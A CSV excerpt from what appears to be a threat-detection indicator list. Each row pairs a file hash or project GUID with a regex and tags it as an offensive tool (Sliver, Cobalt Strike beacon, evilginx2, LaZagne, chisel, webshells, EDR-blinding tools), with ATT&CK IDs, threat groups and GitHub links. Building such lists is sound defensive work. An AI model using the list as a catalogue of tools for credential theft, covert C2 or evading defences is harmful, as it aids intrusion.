"*757d4c9ab64fbb35ad9fd0840e1f92b15b8f27047c700ab0a4329320203115fc*",".{0,1000}757d4c9ab64fbb35ad9fd0840e1f92b15b8f27047c700ab0a4329320203115fc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29109" "*7582aa3ab9f635a0c3ef3522f9922e1628875fef425f81643ea7dd0ca9de68e0*",".{0,1000}7582aa3ab9f635a0c3ef3522f9922e1628875fef425f81643ea7dd0ca9de68e0.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework 
designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","29110" "*75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534*",".{0,1000}75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29111" "*758bfefdfa12df3438061e05f372c7ec5504e0f4374e3c5cc6b0222610ef7c12*",".{0,1000}758bfefdfa12df3438061e05f372c7ec5504e0f4374e3c5cc6b0222610ef7c12.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29114" "*758DB128-9123-4E1B-A6C3-47323714123A*",".{0,1000}758DB128\-9123\-4E1B\-A6C3\-47323714123A.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC 
Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","29115" "*758DB129-9123-4E1B-A6C3-47323714123A*",".{0,1000}758DB129\-9123\-4E1B\-A6C3\-47323714123A.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","29116" "*759204cec7f9891cbc44845bb8fa9976691ed4be2d356db0d15226548e1dde4a*",".{0,1000}759204cec7f9891cbc44845bb8fa9976691ed4be2d356db0d15226548e1dde4a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29117" "*75935a44f53a44754ff3972fdbc5f0e722ca7aad1f374953fc929c7083b5eae9*",".{0,1000}75935a44f53a44754ff3972fdbc5f0e722ca7aad1f374953fc929c7083b5eae9.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29118" "*759531afaa67180eb431415b0961e4da1792653b637edd0c97c086672cdbb2dd*",".{0,1000}759531afaa67180eb431415b0961e4da1792653b637edd0c97c086672cdbb2dd.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include 
functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29119" "*7596c0126181b25c5c68fa91c28bc36d4054dfd94ec424d5209363496482511e*",".{0,1000}7596c0126181b25c5c68fa91c28bc36d4054dfd94ec424d5209363496482511e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29120" "*7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311*",".{0,1000}7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29122" "*75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281*",".{0,1000}75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29123" "*75ae186f6b5f926d7d538642d1258d028eaf404859813c5a0ce53df00115d7ee*",".{0,1000}75ae186f6b5f926d7d538642d1258d028eaf404859813c5a0ce53df00115d7ee.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","29128" "*75b1849a5f5a0c0ace9aee3df84be732f5145421c2ad91cf77933ceb0c5ef069*",".{0,1000}75b1849a5f5a0c0ace9aee3df84be732f5145421c2ad91cf77933ceb0c5ef069.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29129" "*75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139*",".{0,1000}75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29130" "*75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe*",".{0,1000}75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29133" "*75d5f38d2dd472c4d54999cf9b023c92ccb2f5806e78d610325707cb2b8aaa2f*",".{0,1000}75d5f38d2dd472c4d54999cf9b023c92ccb2f5806e78d610325707cb2b8aaa2f.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","29135" 
"*75dcce94ecc2df9392b92c2be705c72626a22c7c8fad662c8a1f3b4dba0228d8*",".{0,1000}75dcce94ecc2df9392b92c2be705c72626a22c7c8fad662c8a1f3b4dba0228d8.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","0","#filehash","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","29136" "*75e1281a581e12bdec70ffa44dbe469847590eab3deddedfe2e6be0b91cf88c2*",".{0,1000}75e1281a581e12bdec70ffa44dbe469847590eab3deddedfe2e6be0b91cf88c2.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","29138" "*75e28e8d08eada3a62ea3decfc6ce51717ef7b8ef581693d7d57111c514f00da*",".{0,1000}75e28e8d08eada3a62ea3decfc6ce51717ef7b8ef581693d7d57111c514f00da.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","29140" "*75e409f0ea3bfc0d705982be384a2a2da1262415fef8b0c253fd9821f9673bf6*",".{0,1000}75e409f0ea3bfc0d705982be384a2a2da1262415fef8b0c253fd9821f9673bf6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29141" "*75E5F9A0-8D69-4426-9F16-4A65E941974D*",".{0,1000}75E5F9A0\-8D69\-4426\-9F16\-4A65E941974D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","29142" "*75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce*",".{0,1000}75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29144" "*75f068e65a36c0dfcd7b59c00ab3a0e73f6bc07ca84091f472caada25e32cfcd*",".{0,1000}75f068e65a36c0dfcd7b59c00ab3a0e73f6bc07ca84091f472caada25e32cfcd.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#filehash","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","29146" "*75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc*",".{0,1000}75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29147" "*75f525cfddff5015fe3aada97fd9ed1b51657297f1f5fa494c3b73ad7766105a*",".{0,1000}75f525cfddff5015fe3aada97fd9ed1b51657297f1f5fa494c3b73ad7766105a.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","29148" "*7607CC54-D49D-4004-8B20-15555D58C842*",".{0,1000}7607CC54\-D49D\-4004\-8B20\-15555D58C842.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","29149" "*760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d*",".{0,1000}760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","29150" "*760c4649c5acd734d931ee64ebfc62eb19fa5c45137f4712b84aba7a356cda91*",".{0,1000}760c4649c5acd734d931ee64ebfc62eb19fa5c45137f4712b84aba7a356cda91.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","#filehash","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","29151" "*7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43*",".{0,1000}7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29152" "*761284ad40b1ab849db7298733b7573b507e94c09378df84b93ce1fcb06ac6b1*",".{0,1000}761284ad40b1ab849db7298733b7573b507e94c09378df84b93ce1fcb06ac6b1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29153" "*7617851366772c98b3aae629f0ec8e63a7863c279e2d8f40875f3c6a50aa0a9f*",".{0,1000}7617851366772c98b3aae629f0ec8e63a7863c279e2d8f40875f3c6a50aa0a9f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29155" "*7623e9f7b2c73cb0dba8415eea6c5ec6534cc1716e314ce49f53951b4968a334*",".{0,1000}7623e9f7b2c73cb0dba8415eea6c5ec6534cc1716e314ce49f53951b4968a334.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29157" "*762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121*",".{0,1000}762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29159" "*76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83*",".{0,1000}76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","#filehash","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","29160" "*7634e6e941bfe0dc600529f03df81785c3f7af96e0b2bdf3f00042318970c538*",".{0,1000}7634e6e941bfe0dc600529f03df81785c3f7af96e0b2bdf3f00042318970c538.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29161" "*763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2*",".{0,1000}763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29162" "*7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36*",".{0,1000}7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29165" "*7648b89b79e72510063a89ad60d807515bea5b595d1dac15891abe1981484e65*",".{0,1000}7648b89b79e72510063a89ad60d807515bea5b595d1dac15891abe1981484e65.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29166" "*764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3*",".{0,1000}764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29167" "*7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40*",".{0,1000}7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29168" "*76571d635c03a27b42b9f28e8148012ee086518932b57e269685b0cad0148336*",".{0,1000}76571d635c03a27b42b9f28e8148012ee086518932b57e269685b0cad0148336.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29170" "*7659d716099e476c563374bd557a93f1c5281844ebd93900cc2f97bc759744b6*",".{0,1000}7659d716099e476c563374bd557a93f1c5281844ebd93900cc2f97bc759744b6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29171" "*765a18c16ac5311b5b5b9c0c3e553e88a7d015322b32eef20989dcefd66c565e*",".{0,1000}765a18c16ac5311b5b5b9c0c3e553e88a7d015322b32eef20989dcefd66c565e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29172" "*765C5755-DBE9-4AB5-9427-921D0E46F9F0*",".{0,1000}765C5755\-DBE9\-4AB5\-9427\-921D0E46F9F0.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#GUIDproject","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","29173" "*7665f456d4b6dd682580898bf304b351b196a1913f3687134478eea4e42a2600*",".{0,1000}7665f456d4b6dd682580898bf304b351b196a1913f3687134478eea4e42a2600.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29174" 